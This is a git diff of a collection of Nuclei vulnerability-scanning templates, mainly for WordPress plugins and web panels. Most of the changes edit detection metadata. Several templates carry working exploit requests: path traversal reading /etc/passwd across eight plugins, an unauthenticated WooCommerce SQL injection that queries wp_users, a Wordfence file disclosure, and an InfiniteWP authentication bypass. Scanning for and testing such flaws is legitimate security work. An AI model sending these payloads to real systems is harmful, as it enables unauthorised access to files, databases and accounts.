body + group: 1 + regex: + - "HELO:(.*).false" + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" diff --git a/poc/web/webmin-panel-11158.yaml b/poc/web/webmin-panel-11158.yaml index 4ddaa63d7d..ee87e5206c 100644 --- a/poc/web/webmin-panel-11158.yaml +++ b/poc/web/webmin-panel-11158.yaml @@ -1,9 +1,11 @@ id: webmin-panel + info: name: Webmin Admin Panel author: PR3R00T severity: info - tags: panel + tags: panel,webmin + requests: - method: GET path: diff --git a/poc/web/webmodule-ee-11162.yaml b/poc/web/webmodule-ee-11162.yaml index ab6ad7a796..b4aa17abf0 100644 --- a/poc/web/webmodule-ee-11162.yaml +++ b/poc/web/webmodule-ee-11162.yaml @@ -1,14 +1,17 @@ id: webmodule-ee-detection + info: name: Webmodule Detection author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/7001 tags: webmodule-ee,tech + requests: - method: GET path: - "{{BaseURL}}/webmodule-ee/login.seam" + matchers-condition: and matchers: - type: word diff --git a/poc/web/webtools-home-11169.yaml b/poc/web/webtools-home-11169.yaml index 14461bfd54..f5cdc13c46 100644 --- a/poc/web/webtools-home-11169.yaml +++ b/poc/web/webtools-home-11169.yaml @@ -1,5 +1,4 @@ id: webtools-home - info: name: Webtools Home author: dhiyaneshDK @@ -7,18 +6,15 @@ info: metadata: shodan-query: http.title:"Webtools" tags: iot - requests: - method: GET path: - "{{BaseURL}}/wt2parser.cgi?home_en" - matchers-condition: and matchers: - type: word words: - 'WebTools | Home' - - type: status status: - 200 diff --git a/poc/web/webui-rce-11172.yaml b/poc/web/webui-rce-11172.yaml index 82d1fab54a..57b71c0d34 100644 --- a/poc/web/webui-rce-11172.yaml +++ b/poc/web/webui-rce-11172.yaml @@ -1,12 +1,14 @@ id: webui-rce + info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 tags: webui,rce - requests: - method: GET path: diff --git a/poc/web/webview-universal-access-11185.yaml b/poc/web/webview-universal-access-11185.yaml index 00e51eac12..56fe5fb8ac 100644 --- a/poc/web/webview-universal-access-11185.yaml +++ b/poc/web/webview-universal-access-11185.yaml @@ -1,12 +1,16 @@ id: webview-universal-access + info: name: Webview Universal Access enabled author: gaurang severity: medium + tags: android,file + file: - extensions: - all + matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file diff --git a/poc/web/xp-webcam-11697.yaml b/poc/web/xp-webcam-11697.yaml index 421bc7db2d..d032aa6167 100644 --- a/poc/web/xp-webcam-11697.yaml +++ b/poc/web/xp-webcam-11697.yaml @@ -1,22 +1,26 @@ -id: xp-webcam -info: - name: XP Webcam Viewer Page - author: aashiq - severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. - tags: webcam,iot -requests: - - method: GET - path: - - "{{BaseURL}}/mobile.html" - matchers-condition: and - matchers: - - type: word - words: - - "webcams and ip cameras server for windows" - part: body - - type: word - words: - - "Please provide a valid username/password to access this server." - part: body - negative: true +id: xp-webcam + +info: + name: XP Webcam Viewer Page + author: aashiq + severity: medium + description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. + tags: webcam,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/mobile.html" + + matchers-condition: and + matchers: + - type: word + words: + - "webcams and ip cameras server for windows" + part: body + + - type: word + words: + - "Please provide a valid username/password to access this server." + part: body + negative: true diff --git a/poc/web/zimbra-web-client-11812.yaml b/poc/web/zimbra-web-client-11812.yaml index aa6445ea84..7e7fa6cfc1 100644 --- a/poc/web/zimbra-web-client-11812.yaml +++ b/poc/web/zimbra-web-client-11812.yaml @@ -1,22 +1,27 @@ id: zimbra-web-client + info: name: Zimbra Web Client - Sign In author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/7409 + reference: + - https://www.exploit-db.com/ghdb/7409 metadata: - shodan-query: 'http.title:"Zimbra Web Client Sign In"' + shodan-query: http.title:"Zimbra Web Client Sign In" tags: panel,zimbra + requests: - method: GET path: - "{{BaseURL}}/zimbraAdmin/" + matchers-condition: and matchers: - type: word part: body words: - "Zimbra Administration" + - type: status status: - 200 diff --git a/poc/web/zoho-webhook-token-11835.yaml b/poc/web/zoho-webhook-token-11835.yaml index 7dd146b904..f3aa557a4a 100644 --- a/poc/web/zoho-webhook-token-11835.yaml +++ b/poc/web/zoho-webhook-token-11835.yaml @@ -3,7 +3,7 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,zoho requests: - method: GET path: diff --git a/poc/wordpress/feedwordpress-xss-7459.yaml b/poc/wordpress/feedwordpress-xss-7459.yaml index 81215e76ac..20cc24cc81 100644 --- a/poc/wordpress/feedwordpress-xss-7459.yaml +++ b/poc/wordpress/feedwordpress-xss-7459.yaml @@ -5,7 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. - reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + reference: + - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 tags: wordpress,wp-plugin,xss,feedwordpress,authenticated requests: diff --git a/poc/wordpress/wordpress-affiliatewp-log-11243.yaml b/poc/wordpress/wordpress-affiliatewp-log-11243.yaml index e41e2cde76..ecacdbc600 100644 --- a/poc/wordpress/wordpress-affiliatewp-log-11243.yaml +++ b/poc/wordpress/wordpress-affiliatewp-log-11243.yaml @@ -1,9 +1,9 @@ id: wordpress-affiliatewp-log info: - name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low - tags: wordpress,log + tags: wordpress,log,plugin requests: - method: GET path: diff --git a/poc/wordpress/wordpress-db-repair-11255.yaml b/poc/wordpress/wordpress-db-repair-11255.yaml new file mode 100644 index 0000000000..5522479e9d --- /dev/null +++ b/poc/wordpress/wordpress-db-repair-11255.yaml @@ -0,0 +1,26 @@ +id: wordpress-db-repair +info: + name: Wordpress DB Repair Exposed + author: _C0wb0y_ + severity: low + description: Discover enabled Wordpress repair page. + tags: wordpress,config,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and + matchers: + - type: word + words: + - "WordPress" + - type: status + status: + - 200 + - type: word + words: + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11258.yaml old mode 100644 new mode 100755 index 8b743b299e..2658a93803 --- a/poc/wordpress/wordpress-debug-log-11258.yaml +++ b/poc/wordpress/wordpress-debug-log-11258.yaml @@ -1,25 +1,43 @@ id: wp-debug-log info: name: WordPress debug log - author: geraldino2,dwisiswant0 + author: + - l0ne1y + description: |- + WordPress debug log 调试信息泄漏漏洞 + WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 + WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 severity: low - tags: wordpress,log + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/debug.log" - matchers-condition: and - matchers: - - type: word - words: - - octet-stream - - text/plain - part: header - condition: or - - type: regex - regex: - - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" - part: body - - type: status - status: - - 200 +- matchers: + - type: word + condition: or + part: header + words: + - octet-stream + - text/plain + - type: regex + part: body + regex: + - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wp-content/debug.log' + method: GET diff --git a/poc/wordpress/wordpress-detect-11260.yaml b/poc/wordpress/wordpress-detect-11260.yaml index cfe326be4c..46ea04ff2b 100644 --- a/poc/wordpress/wordpress-detect-11260.yaml +++ b/poc/wordpress/wordpress-detect-11260.yaml @@ -1,25 +1,30 @@ id: wordpress-detect + info: name: WordPress Detection author: pdteam severity: info - tags: tech,wordpress metadata: shodan-query: http.component:"WordPress" + tags: tech,wordpress + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers-condition: or matchers: + - type: regex regex: - '<link[^>]+s\d+\.wp\.com' - '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -' - '<!--[^>]+WP-Super-Cache' condition: or + - type: word words: - '/wp-content/themes/' @@ -27,8 +32,9 @@ requests: - 'name="generator" content="wordpress' - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/' condition: or + extractors: - type: regex group: 1 regex: - - 'content="WordPress ([0-9.]+)"' + - 'content="WordPress ([0-9.]+)"' \ No newline at end of file diff --git a/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml b/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml index 049baa8262..f9fea9983c 100644 --- a/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml +++ b/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml @@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the elementor wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6297 + reference: https://www.exploit-db.com/ghdb/6297 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-emergency-script-11275.yaml b/poc/wordpress/wordpress-emergency-script-11275.yaml index 3d2a37fc3d..40258b1a9d 100644 --- a/poc/wordpress/wordpress-emergency-script-11275.yaml +++ b/poc/wordpress/wordpress-emergency-script-11275.yaml @@ -5,7 +5,7 @@ info: severity: info tags: wordpress # Ref:- - reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script + # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script requests: - method: GET path: diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml index ee0c48ec1c..3af168a795 100644 --- a/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml +++ b/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml @@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the gtranslate wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6160 + reference: https://www.exploit-db.com/ghdb/6160 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml index 88121a97b7..df56152a95 100644 --- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml +++ b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml @@ -1,10 +1,20 @@ id: wordpress-infinitewp-auth-bypass + info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner + to manage unlimited WordPress sites from their own server. + reference: + - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ + - https://wordpress.org/plugins/iwp-client/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. tags: wordpress,auth-bypass,wp-plugin + requests: - raw: - | @@ -12,13 +22,15 @@ requests: Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 + - | POST / HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} + _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}} + redirects: true extractors: - type: regex @@ -28,6 +40,7 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' + - type: regex name: username internal: true @@ -35,16 +48,21 @@ requests: part: header regex: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' + matchers-condition: and matchers: - type: word words: - "wordpress_logged_in" part: header + - type: word words: - "<IWPHEADER>" + part: body - type: status status: - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/poc/wordpress/wordpress-installer-log-11292.yaml b/poc/wordpress/wordpress-installer-log-11292.yaml index 3e84e512d7..db620f218b 100644 --- a/poc/wordpress/wordpress-installer-log-11292.yaml +++ b/poc/wordpress/wordpress-installer-log-11292.yaml @@ -1,9 +1,11 @@ id: wordpress-installer-log + info: name: WordPress Installer Log author: dwisiswant0 severity: info - tags: wordpress,logs + tags: wordpress,log + requests: - method: GET path: @@ -16,4 +18,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-lfi.yaml b/poc/wordpress/wordpress-lfi.yaml new file mode 100644 index 0000000000..f4bde03529 --- /dev/null +++ b/poc/wordpress/wordpress-lfi.yaml @@ -0,0 +1,25 @@ +id: wordpress-LFI + +info: + name: wordpress-LFI + author: 0x240x23elu + severity: High + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" + - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view" + - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" + - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body \ No newline at end of file diff --git a/poc/wordpress/wordpress-notification-bar-c1a99a966c3b24df1317586247f7c53a.yaml b/poc/wordpress/wordpress-notification-bar-c1a99a966c3b24df1317586247f7c53a.yaml new file mode 100644 index 0000000000..0c355ea19b --- /dev/null +++ b/poc/wordpress/wordpress-notification-bar-c1a99a966c3b24df1317586247f7c53a.yaml @@ -0,0 +1,59 @@ +id: wordpress-notification-bar-c1a99a966c3b24df1317586247f7c53a + +info: + name: > + WordPress Notification Bar <= 1.3.10 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ca8fe2c6-2a7e-4fed-baf0-c8a4979ab966?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wordpress-notification-bar/" + google-query: inurl:"/wp-content/plugins/wordpress-notification-bar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wordpress-notification-bar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-notification-bar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-notification-bar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.10') \ No newline at end of file diff --git a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml b/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml index 116e5709c7..42254c8a52 100644 --- a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml +++ b/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml @@ -4,7 +4,8 @@ info: author: dhiyaneshDk severity: info description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 + reference: + - https://www.exploit-db.com/ghdb/6436 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml index 02d1675a3f..47fe8b3995 100644 --- a/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml +++ b/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml @@ -3,7 +3,8 @@ info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high - reference: https://www.exploit-db.com/exploits/49252 + reference: + - https://www.exploit-db.com/exploits/49252 tags: wordpress,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-user-enum-11330.yaml b/poc/wordpress/wordpress-user-enum-11330.yaml index b113be4fbf..e938ce3114 100644 --- a/poc/wordpress/wordpress-user-enum-11330.yaml +++ b/poc/wordpress/wordpress-user-enum-11330.yaml @@ -1,13 +1,16 @@ id: wordpress-user-enum + info: name: Wordpress User Enumeration author: r3dg33k severity: info tags: wordpress + requests: - method: GET path: - "{{BaseURL}}/?author=1" + matchers-condition: and matchers: - type: regex @@ -17,6 +20,7 @@ requests: - type: status status: - 301 + extractors: - type: regex part: header diff --git a/poc/wordpress/wordpress-woocommerce-sqli-11344.yaml b/poc/wordpress/wordpress-woocommerce-sqli-11344.yaml index 8a96cfe510..81d422c278 100644 --- a/poc/wordpress/wordpress-woocommerce-sqli-11344.yaml +++ b/poc/wordpress/wordpress-woocommerce-sqli-11344.yaml @@ -1,43 +1,28 @@ id: wordpress-woocommerce-sqli - info: - name: Woocommerce Unauthenticated SQL Injection + name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 - tags: wordpress,woocommerce,sqli,wp-plugin,injection - requests: - method: GET path: - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - matchers-condition: and matchers: - type: word words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - - type: word words: - 'application/json' part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/wordpress/wordpress-wordfence-lfi-11351.yaml b/poc/wordpress/wordpress-wordfence-lfi-11351.yaml index d730bafdc6..a7d8606021 100644 --- a/poc/wordpress/wordpress-wordfence-lfi-11351.yaml +++ b/poc/wordpress/wordpress-wordfence-lfi-11351.yaml @@ -7,19 +7,15 @@ info: - https://www.exploit-db.com/exploits/48061 - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ tags: wordpress,wp-plugin,lfi,wordfence - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml index ef0527d5a1..6f3cc78548 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml @@ -1,10 +1,9 @@ id: wordpress-wordfence-waf-bypass-xss info: - name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam + name: Wordfence WAF Bypass WordPress XSS + reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml index 612495b0a8..4395aef47f 100644 --- a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml +++ b/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml @@ -1,14 +1,18 @@ id: wordpress-xmlrpc-listmethods + info: name: Wordpress XML-RPC List System Methods author: 0ut0fb4nd severity: info tags: wordpress + requests: - method: POST path: - "{{BaseURL}}/xmlrpc.php" + body: "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" + matchers-condition: and matchers: - type: status @@ -20,4 +24,4 @@ requests: - "system.listMethods" - "demo.sayHello" condition: and - part: body + part: body \ No newline at end of file diff --git a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml index eb070bb0f2..4094c066d1 100644 --- a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml +++ b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml @@ -1,11 +1,13 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss + requests: - raw: - | @@ -35,4 +37,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml b/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml index c530b9ee9d..dc8fd403a8 100644 --- a/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml +++ b/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml @@ -2,12 +2,12 @@ id: wp-123contactform-plugin-listing info: name: WordPress 123ContactForm Plugin Directory Listing author: pussycat0x - severity: info + severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: + reference: | - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing,plugin + tags: wordpress,listing requests: - method: GET path: diff --git a/poc/wordpress/wp-altair-listing-11406.yaml b/poc/wordpress/wp-altair-listing-11406.yaml index f296ad45a5..3c3a1e0eda 100644 --- a/poc/wordpress/wp-altair-listing-11406.yaml +++ b/poc/wordpress/wp-altair-listing-11406.yaml @@ -1,10 +1,12 @@ id: wp-altair-listing + info: name: Altair WordPress theme v4.8 - Directory Listing author: pussycat0x severity: info description: Searches for directories listing in the altair theme. tags: wordpress,listing,wp-theme + requests: - method: GET path: @@ -12,6 +14,7 @@ requests: - "{{BaseURL}}/wp-content/themes/altair/functions/" - "{{BaseURL}}/wp-content/themes/altair/images/flip/" - "{{BaseURL}}/wp-content/themes/altair/images/" + matchers-condition: and matchers: - type: word @@ -19,6 +22,7 @@ requests: - "Index of" - "wp-content/themes/altair" condition: and + - type: status status: - 200 diff --git a/poc/wordpress/wp-arforms-listing-11415.yaml b/poc/wordpress/wp-arforms-listing-11415.yaml index 32df4d1c94..e223f9ef7d 100644 --- a/poc/wordpress/wp-arforms-listing-11415.yaml +++ b/poc/wordpress/wp-arforms-listing-11415.yaml @@ -1,5 +1,4 @@ id: wp-arforms-listing - info: name: WordPress Plugin Arforms Listing author: pussycat0x @@ -8,23 +7,17 @@ info: reference: - https://www.exploit-db.com/ghdb/6424 tags: wordpress,listing,plugin - requests: - - method: GET path: - "{{BaseURL}}/wp-content/plugins/arforms/" - matchers-condition: and - matchers: - type: word words: - "Index of" - "wp-content/plugins/arforms/" condition: and - - type: status - status: - 200 diff --git a/poc/wordpress/wp-cafe-68931e117cd1bb8fea7035cc6312bf1d.yaml b/poc/wordpress/wp-cafe-68931e117cd1bb8fea7035cc6312bf1d.yaml new file mode 100644 index 0000000000..3547b55747 --- /dev/null +++ b/poc/wordpress/wp-cafe-68931e117cd1bb8fea7035cc6312bf1d.yaml @@ -0,0 +1,59 @@ +id: wp-cafe-68931e117cd1bb8fea7035cc6312bf1d + +info: + name: > + WPCafe <= 2.2.27 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/963cb544-165e-4378-9844-753c72bf2274?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-cafe/" + google-query: inurl:"/wp-content/plugins/wp-cafe/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-cafe,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-cafe/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-cafe" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.27') \ No newline at end of file diff --git a/poc/wordpress/wp-church-admin-xss-11422.yaml b/poc/wordpress/wp-church-admin-xss-11422.yaml index 6dfb09ebcb..350e16aad1 100644 --- a/poc/wordpress/wp-church-admin-xss-11422.yaml +++ b/poc/wordpress/wp-church-admin-xss-11422.yaml @@ -3,8 +3,7 @@ info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: https://www.securityfocus.com/bid/54329/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-code-snippets-xss-11425.yaml b/poc/wordpress/wp-code-snippets-xss-11425.yaml index b3552bcadb..ebf8c132fd 100644 --- a/poc/wordpress/wp-code-snippets-xss-11425.yaml +++ b/poc/wordpress/wp-code-snippets-xss-11425.yaml @@ -1,11 +1,15 @@ id: wp-code-snippets-xss + info: - name: Code Snippets Wordpress Plugin - XSS + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - 